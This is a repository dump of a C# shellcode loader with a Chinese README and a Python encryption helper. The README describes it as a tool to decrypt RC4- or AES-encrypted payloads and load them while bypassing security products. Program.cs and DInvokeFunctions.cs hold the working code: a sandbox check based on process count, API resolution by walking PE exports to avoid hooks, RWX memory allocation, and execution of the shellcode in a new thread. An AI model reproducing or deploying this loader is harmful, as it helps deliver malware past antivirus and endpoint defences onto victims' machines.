├── .vs └── Shellcode解密加载 │ ├── FileContentIndex │ ├── 34c69d00-98b2-4caa-b5d4-ee6dfb9955ad.vsidx │ ├── 55a31f78-c6ad-4617-a8d3-b7447ddc5692.vsidx │ ├── 9d0a2bbc-1d9e-4286-96cb-549b2020059e.vsidx │ ├── c5df3d70-b243-41aa-8a66-d4c46154a1cb.vsidx │ └── read.lock │ └── v17 │ └── .suo ├── README.MD ├── README ├── image-20231004202531392.png └── image-20231006201852683.png ├── Shellcode解密加载.sln ├── Shellcode解密加载 ├── DELEGATES.cs ├── DInvokeFunctions.cs ├── Program.cs ├── Properties │ └── AssemblyInfo.cs ├── Shellcode解密加载.csproj ├── bin │ ├── Debug │ │ ├── Shellcode解密加载.exe │ │ └── Shellcode解密加载.pdb │ └── Release │ │ ├── Shellcode解密加载.exe │ │ └── Shellcode解密加载.pdb └── obj │ ├── Debug │ ├── .NETFramework,Version=v4.0.AssemblyAttributes.cs │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── Shellcode解密加载.csproj.AssemblyReference.cache │ ├── Shellcode解密加载.csproj.CoreCompileInputs.cache │ ├── Shellcode解密加载.csproj.FileListAbsolute.txt │ ├── Shellcode解密加载.exe │ └── Shellcode解密加载.pdb │ └── Release │ ├── .NETFramework,Version=v4.0.AssemblyAttributes.cs │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── Shellcode解密加载.csproj.AssemblyReference.cache │ ├── Shellcode解密加载.csproj.CoreCompileInputs.cache │ ├── Shellcode解密加载.csproj.FileListAbsolute.txt │ ├── Shellcode解密加载.exe │ └── Shellcode解密加载.pdb └── encrypt_file.py /.vs/Shellcode解密加载/FileContentIndex/34c69d00-98b2-4caa-b5d4-ee6dfb9955ad.vsidx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/.vs/Shellcode解密加载/FileContentIndex/34c69d00-98b2-4caa-b5d4-ee6dfb9955ad.vsidx -------------------------------------------------------------------------------- /.vs/Shellcode解密加载/FileContentIndex/55a31f78-c6ad-4617-a8d3-b7447ddc5692.vsidx: -------------------------------------------------------------------------------- 1 | CDGS7"")");")]"*""1."AE"AR"CO"CR"DA"F1"KE"LE"RC"SH"TH"VI"WA"[*'TH(""("1("A("C("F("K("L("S("T("[(%)((S((U())().();(0)(0,(10(AE(AR(BY(CO(CR(DA(DE(DL(FA(FU(HT(IN(IV(KE(ME(PA(PO(PR(RM(ST(S[(T)(TH(UI(WH(^))(R));).H).L)AE)CO)MS*")++)-4F-73-B0-B7.").(D.*".."....0".0..AP.BL.CL.CO.CR.DE.DI.DL.EX.GE.HA.IN.IO.IV.KE.LE.LI.OR.PA.RE.RU.SE.SL.TA.TE.TH.TO.UT.VI.WA.WI.WR.ZE/////C//D//E//G//P/CO/DE/DI/EN/GI/MA/PA/PR/RC/RE/SU/WI0")0);0.*0.000)00,00001702306-0DD0X10X20X40XF0];1.010016]17-1C41];2.D20020223"25525629-2A:2B:2];3")32.3A84")4.A40)4494924F74_D55,56)56,56;56]6-769D6];7-470673A7F-8.G8C09")9-B9299D9://="D="K>(">(SA">A))A.LA.OA8CABOACEACKAD"AD(AD,AD.ADAADDADEADIADRAD_AESAGNAINAITAL.ALAALGALIALLALSALUAM(AM)AM>AMEAMIAMMANBANDANGANSANYAPHAPPARAARDAREARGARKARRARSARTARYASCASEASKASSATAATEATHATIAY(AYLA[IB.CB01B70BACBEABEYBITBJEBKEBLEBLIBLOBLYBOVBRABUFBYTC")C);C.GC0DC4"C4.C44C4_CADCCECDECEDCENCESCHECINCIPCKCCKPCKSCLACLOCLUCODCOLCOMCONCOPCOUCRECRICRXCRYCS.CS;CT"CT(CTECTICTOCTRCULCURC_PD")D("D(ID);D.SD/DD69D9"DALDATDD6DDIDDRDE,DE.DE:DECDELDEMDEPDERDESDEXDGADIADIDDINDIVDLEDLLDLSDOMDONDREDRXDUCDULDYND_PE("E((E()E(DE(FE))E);E)AE)]E.CE.GE.IE.LE.RE.WEKSAKSIKUPL",L.CL.GL32LAILALLASLBYLCOLE(LE.LE;LECLEELEGLEMLENLEOLERLESLEVLGOLIBLICLINLIZLL"LL;LLBLLCLLELLNLLOLNALOALOCLONLOOLOSLSELT;LTILTULT[LUELUSLY(LY:LYCLYDLYFLYPLYTLYVM((M()M(DM)MM.CM.DM.IM.LM.RM.SM.TM/MMADMAIMANMARMBLME)ME,ME.ME=MEAMEMMENMESMETMICMITMMAMMEMMOMODMORMP;MPAMPIMPOMS,MS.MUTMVIN("N(SN):N++N.WNALNAMNBENCANCENCONCRNCTNC_NDENDINDLNDONE(NECNEDNEENELNERNEWNEXNFINFONG(NG)NG.NGENGLNGTNG[NINNITNMENNANNINOSNOUNPONPUNQ;NS.NS>NSENSONT)NT,NT.NT3NTANTENTINTONTPNTRNTSNT[NULNVENVINVONY(OADOAROBJOBYOC"OCDOCEOCKOCRODEODIODUOF(OFFOGROIDOINOKEOKUOLEOLLOM/OM:OMPOMVON(ON)ON+ON.ON;ONCONDONEONFONGONMONNONPONSONTONVON]OOKOPSOPYOR!OR(ORAORDORFORGORIORKORSORYOSEOSTOTHOUNOUROUSOVEOVIOWEP(1PACPADPANPARPATPAYPEAPECPEDPENPEOPERPHAPHEPHYPILPINPLAPLYPOIPORPPLPREPRGPRIPROPS:PSEPT(PTEPTIPTOPTRPUBPUTPY(PYRQUAR(AR(FR(PR)(R.BR.TR.ZRADRAMRANRAPRARRATRAYRC4RCERDERDGRE(REAREFREMRENREPRESRETRFURG/RGARGSRICRIERIGRINRIPRITRIVRK(RKSRMERMURNARNERNSRO;ROCRODROGROMRONROPRORROVRRARRERRORSERSHRSIRSTRT.RTERTIRTURUERUNRVIRWIRX(RX)RX;RX>RY>RYARYPRYSS")S("S()S(DS(KS(PS),S.(S.BS.CS.GS.IS.KS.LS.PS.RS.TS.VS.WS/RS:"S:/SARSCESCHSCOSCRSE(SE)SE,SE:SECSEDSEMSENSERSESSETSEUSHASHESIBSIGSINSIOSIVSIZSKSSLESLYSOLSOUSPASS(SS)SS,SS.SSASSCSSESSIST,STASTESTISTRSULSUMSWASYMSYSS[(S[0S[1S[2S[IS[JS[_S_DT")T("T()T(0T(KT(ST))T)CT.ET.LT.TT32T>(TA"TA)TA,TA.TANTARTASTATTA[TBYTCOTCUTDETE(TE)TE(XCLXFFXITXPEXT,XT;Y">Y("Y()Y(BY(CY(DY(KY);Y.CY.LYADYCOYCUYDEYFIYLOYMMYNAYONYPEYPRYPTYRIYSIYSTYTEYTIYTRYVEY[_ZE)ZE:ZEDZER[(S[*][0][16[1][25[2][AS[DA[IT[I][J][_]_++_DE_PA_PT ('3?7 -------------------------------------------------------------------------------- /.vs/Shellcode解密加载/FileContentIndex/9d0a2bbc-1d9e-4286-96cb-549b2020059e.vsidx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/.vs/Shellcode解密加载/FileContentIndex/9d0a2bbc-1d9e-4286-96cb-549b2020059e.vsidx -------------------------------------------------------------------------------- /.vs/Shellcode解密加载/FileContentIndex/c5df3d70-b243-41aa-8a66-d4c46154a1cb.vsidx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/.vs/Shellcode解密加载/FileContentIndex/c5df3d70-b243-41aa-8a66-d4c46154a1cb.vsidx -------------------------------------------------------------------------------- /.vs/Shellcode解密加载/FileContentIndex/read.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/.vs/Shellcode解密加载/FileContentIndex/read.lock -------------------------------------------------------------------------------- /.vs/Shellcode解密加载/v17/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/.vs/Shellcode解密加载/v17/.suo -------------------------------------------------------------------------------- /README.MD: -------------------------------------------------------------------------------- 1 | # 项目简介 2 | 3 | 这个项目提供了一个工具,用于解密并加载shellcode。它支持RC4和AES两种解密方法,并使用DInvoke来动态调用WinAPI函数,从而尝试绕过某些安全解决方案 4 | 5 | DInvoke 是一个用于在 Windows 上动态替换 PInvoke 的库。DInvoke 包含了强大的原始功能,可以智能地组合使用,以精确地从磁盘或内存动态调用非托管代码。这可以用于多种目的,如 PE 解析、智能动态 API 解析、运行时动态加载 PE 插件、进程注入和避免 API 钩子。 6 | 7 | 8 | 9 | # 功能 10 | 11 | - **解密Shellcode**: 支持RC4和AES两种解密算法。 12 | - **动态API调用**: 使用DInvoke动态调用WinAPI函数。 13 | - **反沙箱技术**: 通过检查系统进程数量来尝试检测沙箱环境。 14 | 15 | 16 | 17 | # 使用方法 18 | 19 | 使用encrypt.py对payload文件进行aes或rc4加密,随后会在控制台输出密钥以及当前目录生成加密后的payload文件, 如下是aes加密的例子: 20 | 21 | ``` 22 | python.exe .\encrypt_file.py aes encrypt .\payload.bin 23 | ``` 24 | 25 | ![image-20231004202531392](README/image-20231004202531392.png) 26 | 27 | 28 | 29 | 再使用本项目解密shellcode并加载, 使用方法如下: 30 | 31 | ``` 32 | Shellcode解密加载.exe [payload_path] [decryption_method] [key] 33 | ``` 34 | 35 | - `payload_path`: 加密的shellcode的路径。 36 | - `decryption_method`: 使用的解密方法,可以是`rc4`或`aes`。 37 | - `key`: 解密密钥。 38 | 39 | image-20231006201852683 40 | 41 | 42 | 43 | -------------------------------------------------------------------------------- /README/image-20231004202531392.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/README/image-20231004202531392.png -------------------------------------------------------------------------------- /README/image-20231006201852683.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/README/image-20231006201852683.png -------------------------------------------------------------------------------- /Shellcode解密加载.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.5.33530.505 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Shellcode解密加载", "Shellcode解密加载\Shellcode解密加载.csproj", "{F1C44929-B017-4F7F-B706-73A8C0DD69D9}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {F1C44929-B017-4F7F-B706-73A8C0DD69D9}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {F1C44929-B017-4F7F-B706-73A8C0DD69D9}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {F1C44929-B017-4F7F-B706-73A8C0DD69D9}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {F1C44929-B017-4F7F-B706-73A8C0DD69D9}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {3112241E-796B-47C8-B699-5B6C77336B3D} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Shellcode解密加载/DELEGATES.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Runtime.InteropServices; 7 | 8 | namespace Shellcode解密加载 9 | { 10 | // 委托的定义 11 | public class DELEGATES 12 | { 13 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 14 | public delegate IntPtr VirtualAllocRx( 15 | UInt32 lpStartAddr, 16 | UInt32 size, 17 | UInt32 flAllocationType, 18 | UInt32 flProtect 19 | ); 20 | 21 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 22 | public delegate IntPtr CreateThreadRx( 23 | UInt32 lpThreadAttributes, 24 | UInt32 dwStackSize, 25 | IntPtr lpStartAddress, 26 | IntPtr param, 27 | UInt32 dwCreationFlags, 28 | ref UInt32 lpThreadId 29 | ); 30 | 31 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 32 | public delegate UInt32 WaitForSingleObjectRx(IntPtr hHandle, UInt32 dwMilliseconds); 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /Shellcode解密加载/DInvokeFunctions.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Diagnostics; 4 | using System.Linq; 5 | using System.Text; 6 | using System.Threading.Tasks; 7 | using System.Runtime.InteropServices; 8 | using System.IO; 9 | 10 | namespace Shellcode解密加载 11 | { 12 | public class DInvokeFunctions 13 | { 14 | // 获取已加载模块的地址 15 | public static IntPtr GetLoadedModuleAddress(string DLLName) 16 | { 17 | // 获取当前进程的所有模块 18 | ProcessModuleCollection ProcModules = Process.GetCurrentProcess().Modules; 19 | 20 | // 遍历每个模块,查找匹配的DLL名称 21 | foreach (ProcessModule Mod in ProcModules) 22 | { 23 | if (Mod.FileName.ToLower().EndsWith(DLLName.ToLower())) 24 | { 25 | return Mod.BaseAddress; 26 | } 27 | } 28 | return IntPtr.Zero; 29 | } 30 | 31 | // 获取库中函数的地址 32 | public static IntPtr GetLibraryAddress(string DLLName, string FunctionName, bool CanLoadFromDisk = false) 33 | { 34 | // 尝试获取已加载的模块地址 35 | IntPtr hModule = GetLoadedModuleAddress(DLLName); 36 | 37 | // 如果模块未加载,并且允许从磁盘加载,则尝试从磁盘加载模块 38 | if (hModule == IntPtr.Zero && CanLoadFromDisk) 39 | { 40 | hModule = LoadModuleFromDisk(DLLName); 41 | if (hModule == IntPtr.Zero) 42 | { 43 | throw new FileNotFoundException(DLLName + ", unable to find the specified file."); 44 | } 45 | } 46 | else if (hModule == IntPtr.Zero) 47 | { 48 | throw new DllNotFoundException(DLLName + ", Dll was not found."); 49 | } 50 | 51 | // 返回函数的导出地址 52 | return GetExportAddress(hModule, FunctionName); 53 | } 54 | 55 | // 获取模块中导出函数的地址 56 | public static IntPtr GetExportAddress(IntPtr ModuleBase, string ExportName) 57 | { 58 | IntPtr FunctionPtr = IntPtr.Zero; 59 | try 60 | { 61 | // 解析PE头部以获取导出表信息 62 | Int32 PeHeader = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + 0x3C)); 63 | Int16 OptHeaderSize = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + PeHeader + 0x14)); 64 | Int64 OptHeader = ModuleBase.ToInt64() + PeHeader + 0x18; 65 | Int16 Magic = Marshal.ReadInt16((IntPtr)OptHeader); 66 | Int64 pExport = 0; 67 | if (Magic == 0x010b) 68 | { 69 | pExport = OptHeader + 0x60; 70 | } 71 | else 72 | { 73 | pExport = OptHeader + 0x70; 74 | } 75 | 76 | // 获取导出表的详细信息 77 | Int32 ExportRVA = Marshal.ReadInt32((IntPtr)pExport); 78 | Int32 OrdinalBase = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x10)); 79 | Int32 NumberOfFunctions = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x14)); 80 | Int32 NumberOfNames = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x18)); 81 | Int32 FunctionsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x1C)); 82 | Int32 NamesRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x20)); 83 | Int32 OrdinalsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x24)); 84 | 85 | // 遍历导出名称表,查找匹配的函数名称 86 | for (int i = 0; i < NumberOfNames; i++) 87 | { 88 | string FunctionName = Marshal.PtrToStringAnsi((IntPtr)(ModuleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + NamesRVA + i * 4)))); 89 | if (FunctionName.Equals(ExportName, StringComparison.OrdinalIgnoreCase)) 90 | { 91 | Int32 FunctionOrdinal = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + OrdinalsRVA + i * 2)) + OrdinalBase; 92 | Int32 FunctionRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + FunctionsRVA + (4 * (FunctionOrdinal - OrdinalBase)))); 93 | FunctionPtr = (IntPtr)((Int64)ModuleBase + FunctionRVA); 94 | break; 95 | } 96 | } 97 | } 98 | catch 99 | { 100 | // 捕获解析失败 101 | throw new InvalidOperationException("Failed to parse module exports."); 102 | } 103 | 104 | if (FunctionPtr == IntPtr.Zero) 105 | { 106 | // 导出未找到 107 | throw new MissingMethodException(ExportName + ", export not found."); 108 | } 109 | return FunctionPtr; 110 | } 111 | 112 | // 从磁盘加载模块(此函数当前未实现) 113 | public static IntPtr LoadModuleFromDisk(string DLLPath) 114 | { 115 | // 此函数未实现,只返回IntPtr.Zero 116 | IntPtr hModule = IntPtr.Zero; 117 | return hModule; 118 | } 119 | } 120 | } 121 | -------------------------------------------------------------------------------- /Shellcode解密加载/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Runtime.InteropServices; 5 | using System.Text; 6 | using System.Threading.Tasks; 7 | using System.Diagnostics; 8 | using System.Security.Cryptography; 9 | using System.IO; 10 | using static Shellcode解密加载.DELEGATES; 11 | 12 | 13 | namespace Shellcode解密加载 14 | { 15 | internal class Program 16 | { 17 | static void Main(string[] args) 18 | { 19 | CheckProcessCountAndExit(); 20 | if (args.Length != 3) 21 | { 22 | Console.WriteLine("Args count Error! The program need 3 args"); 23 | } 24 | 25 | string payload_path = args[0]; 26 | string decryption = args[1]; 27 | string key = args[2]; 28 | byte[] code = null; 29 | 30 | if (decryption == "rc4") 31 | { 32 | code = RC4_Decrypt(key, File.ReadAllBytes(payload_path)); 33 | } 34 | else if (decryption == "aes") 35 | { 36 | code = AES_Decrypt(key, File.ReadAllBytes(payload_path)); 37 | } 38 | else 39 | { 40 | Console.WriteLine("The input of Arg 2 is rc4 or aes"); 41 | } 42 | 43 | IntPtr func_ptr = IntPtr.Zero; 44 | 45 | var VirtualAllocRx = GetFunctionDelegate("kernel32.dll", "VirtualAlloc"); 46 | IntPtr rMemAddress = VirtualAllocRx(0, (uint)code.Length, 0x1000 | 0x2000, 0x40); 47 | 48 | Marshal.Copy(code, 0, (IntPtr)(rMemAddress), code.Length); 49 | IntPtr hThread = IntPtr.Zero; 50 | IntPtr pinfo = IntPtr.Zero; 51 | UInt32 threadId = 0; 52 | 53 | var CreateThreadRx = GetFunctionDelegate("kernel32.dll", "CreateThread"); 54 | hThread = CreateThreadRx(0, 0, rMemAddress, pinfo, 0, ref threadId); 55 | 56 | var WaitForSingleObjectRx = GetFunctionDelegate("kernel32.dll", "WaitForSingleObject"); 57 | WaitForSingleObjectRx(hThread, 0xFFFFFFFF); 58 | } 59 | 60 | // 获取函数委托 61 | private static T GetFunctionDelegate(string dllName, string functionName) where T : class 62 | { 63 | IntPtr funcAddress = DInvokeFunctions.GetLibraryAddress(dllName, functionName); 64 | return Marshal.GetDelegateForFunctionPointer(funcAddress, typeof(T)) as T; 65 | } 66 | 67 | // RC4解密函数 68 | public static byte[] RC4_Decrypt(string key, byte[] data) 69 | { 70 | byte[] bkey = Encoding.UTF8.GetBytes(key); 71 | 72 | byte[] dec = RC4.Apply(data, bkey); 73 | 74 | return dec; 75 | } 76 | 77 | // AES解密函数 78 | public static byte[] AES_Decrypt(string key, byte[] data) 79 | { 80 | byte[] dec; 81 | 82 | using (Aes aes = Aes.Create()) 83 | { 84 | aes.Key = Encoding.UTF8.GetBytes(key); 85 | 86 | Console.WriteLine("[*] Key bytes: " + aes.Key.Length); 87 | Console.WriteLine("[*] Padding mode: " + (byte)aes.Padding); 88 | Console.WriteLine("[*] AES keysize: " + aes.KeySize); 89 | Console.WriteLine("[*] AES blockSize: " + aes.BlockSize); 90 | 91 | using (MemoryStream ms = new MemoryStream(data)) 92 | { 93 | // 从数据中读取IV 94 | byte[] iv = new byte[16]; 95 | ms.Read(iv, 0, iv.Length); 96 | aes.IV = iv; 97 | 98 | // 输出IV信息 99 | Console.WriteLine("[*] IV length: " + aes.IV.Length); 100 | Console.WriteLine("[*] IV bytes: " + BitConverter.ToString(aes.IV)); 101 | } 102 | 103 | using (MemoryStream ms = new MemoryStream()) 104 | { 105 | using (CryptoStream cs = new CryptoStream((Stream)ms, aes.CreateDecryptor(aes.Key, aes.IV), CryptoStreamMode.Write)) 106 | { 107 | //Provide IV offset, expected length of decrypted plaintext, and write to CryptoStream 108 | int DecryptedLength = (data.Length - aes.IV.Length); 109 | cs.Write(data, aes.IV.Length, DecryptedLength); 110 | cs.Close(); 111 | } 112 | 113 | dec = ms.ToArray(); 114 | ms.Close(); 115 | } 116 | } 117 | //Console.WriteLine("[*] Decrypted Bytes:" + dec); 118 | return dec; 119 | } 120 | 121 | // 利用检测进程数实现反沙箱 122 | private static void CheckProcessCountAndExit() 123 | { 124 | var processCount = Process.GetProcesses().Length; 125 | if (processCount < 40) 126 | { 127 | Console.WriteLine("Less than 40 processes are running. Exiting..."); 128 | Environment.Exit(0); 129 | } 130 | } 131 | } 132 | public static class RC4 133 | { 134 | /// RC4 class sourced from: https://github.com/manbeardgames/RC4 135 | /// MIT License 136 | /// 137 | /// Give data and an encryption key, apply RC4 cryptography. RC4 is symmetric, 138 | /// which means this single method will work for encrypting and decrypting. 139 | /// 140 | /// 141 | /// https://en.wikipedia.org/wiki/RC4 142 | /// 143 | /// 144 | /// Byte array representing the data to be encrypted/decrypted 145 | /// 146 | /// 147 | /// Byte array representing the key to use 148 | /// 149 | /// 150 | /// Byte array representing the encrypted/decrypted data. 151 | /// 152 | public static byte[] Apply(byte[] data, byte[] key) 153 | { 154 | // Key Scheduling Algorithm Phase: 155 | // KSA Phase Step 1: First, the entries of S are set equal to the values of 0 to 255 156 | // in ascending order. 157 | int[] S = new int[256]; 158 | for (int _ = 0; _ < 256; _++) 159 | { 160 | S[_] = _; 161 | } 162 | 163 | // KSA Phase Step 2a: Next, a temporary vector T is created. 164 | int[] T = new int[256]; 165 | 166 | // KSA Phase Step 2b: If the length of the key k is 256 bytes, then k is assigned to T. 167 | if (key.Length == 256) 168 | { 169 | Buffer.BlockCopy(key, 0, T, 0, key.Length); 170 | } 171 | else 172 | { 173 | // Otherwise, for a key with a given length, copy the elements of 174 | // the key into vector T, repeating for as many times as neccessary to 175 | // fill T 176 | for (int _ = 0; _ < 256; _++) 177 | { 178 | T[_] = key[_ % key.Length]; 179 | } 180 | } 181 | 182 | // KSA Phase Step 3: We use T to produce the initial permutation of S ... 183 | int i = 0; 184 | int j = 0; 185 | for (i = 0; i < 256; i++) 186 | { 187 | // increment j by the sum of S[i] and T[i], however keeping it within the 188 | // range of 0 to 255 using mod (%) division. 189 | j = (j + S[i] + T[i]) % 256; 190 | 191 | // Swap the values of S[i] and S[j] 192 | int temp = S[i]; 193 | S[i] = S[j]; 194 | S[j] = temp; 195 | } 196 | 197 | // Pseudo random generation algorithm (Stream Generation): 198 | // Once the vector S is initialized from above in the Key Scheduling Algorithm Phase, 199 | // the input key is no longer used. In this phase, for the length of the data, we ... 200 | i = j = 0; 201 | byte[] result = new byte[data.Length]; 202 | for (int iteration = 0; iteration < data.Length; iteration++) 203 | { 204 | // PRGA Phase Step 1. Continously increment i from 0 to 255, starting it back 205 | // at 0 once we go beyond 255 (this is done with mod (%) division 206 | i = (i + 1) % 256; 207 | 208 | // PRGA Phase Step 2. Lookup the i'th element of S and add it to j, keeping the 209 | // result within the range of 0 to 255 using mod (%) division 210 | j = (j + S[i]) % 256; 211 | 212 | // PRGA Phase Step 3. Swap the values of S[i] and S[j] 213 | int temp = S[i]; 214 | S[i] = S[j]; 215 | S[j] = temp; 216 | 217 | // PRGA Phase Step 4. Use the result of the sum of S[i] and S[j], mod (%) by 256, 218 | // to get the index of S that handls the value of the stream value K. 219 | int K = S[(S[i] + S[j]) % 256]; 220 | 221 | // PRGA Phase Step 5. Use bitwise exclusive OR (^) with the next byte in the data to 222 | // produce the next byte of the resulting ciphertext (when 223 | // encrypting) or plaintext (when decrypting) 224 | result[iteration] = Convert.ToByte(data[iteration] ^ K); 225 | } 226 | 227 | // return the result 228 | return result; 229 | } 230 | } 231 | } 232 | -------------------------------------------------------------------------------- /Shellcode解密加载/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // 有关程序集的一般信息由以下 6 | // 控制。更改这些特性值可修改 7 | // 与程序集关联的信息。 8 | [assembly: AssemblyTitle("Shellcode解密加载")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("Shellcode解密加载")] 13 | [assembly: AssemblyCopyright("Copyright © 2023")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // 将 ComVisible 设置为 false 会使此程序集中的类型 18 | //对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型 19 | //请将此类型的 ComVisible 特性设置为 true。 20 | [assembly: ComVisible(false)] 21 | 22 | // 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID 23 | [assembly: Guid("f1c44929-b017-4f7f-b706-73a8c0dd69d9")] 24 | 25 | // 程序集的版本信息由下列四个值组成: 26 | // 27 | // 主版本 28 | // 次版本 29 | // 生成号 30 | // 修订号 31 | // 32 | //可以指定所有这些值,也可以使用“生成号”和“修订号”的默认值 33 | //通过使用 "*",如下所示: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Shellcode解密加载/Shellcode解密加载.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {F1C44929-B017-4F7F-B706-73A8C0DD69D9} 8 | Exe 9 | Shellcode解密加载 10 | Shellcode解密加载 11 | v4.0 12 | 512 13 | true 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /Shellcode解密加载/bin/Debug/Shellcode解密加载.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/Shellcode解密加载/bin/Debug/Shellcode解密加载.exe -------------------------------------------------------------------------------- /Shellcode解密加载/bin/Debug/Shellcode解密加载.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/Shellcode解密加载/bin/Debug/Shellcode解密加载.pdb -------------------------------------------------------------------------------- /Shellcode解密加载/bin/Release/Shellcode解密加载.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/Shellcode解密加载/bin/Release/Shellcode解密加载.exe -------------------------------------------------------------------------------- /Shellcode解密加载/bin/Release/Shellcode解密加载.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/Shellcode解密加载/bin/Release/Shellcode解密加载.pdb -------------------------------------------------------------------------------- /Shellcode解密加载/obj/Debug/.NETFramework,Version=v4.0.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.0", FrameworkDisplayName = ".NET Framework 4")] 5 | -------------------------------------------------------------------------------- /Shellcode解密加载/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/Shellcode解密加载/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Shellcode解密加载/obj/Debug/Shellcode解密加载.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xf555er/SharpShellcodeLoader_Rc4Aes/effe42c436f9499db7eb448bafe463991ef4839c/Shellcode解密加载/obj/Debug/Shellcode解密加载.csproj.AssemblyReference.cache -------------------------------------------------------------------------------- /Shellcode解密加载/obj/Debug/Shellcode解密加载.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | bd903e1a1fb2f29aa1f31b8873552a5fa8da21c7 2 | -------------------------------------------------------------------------------- 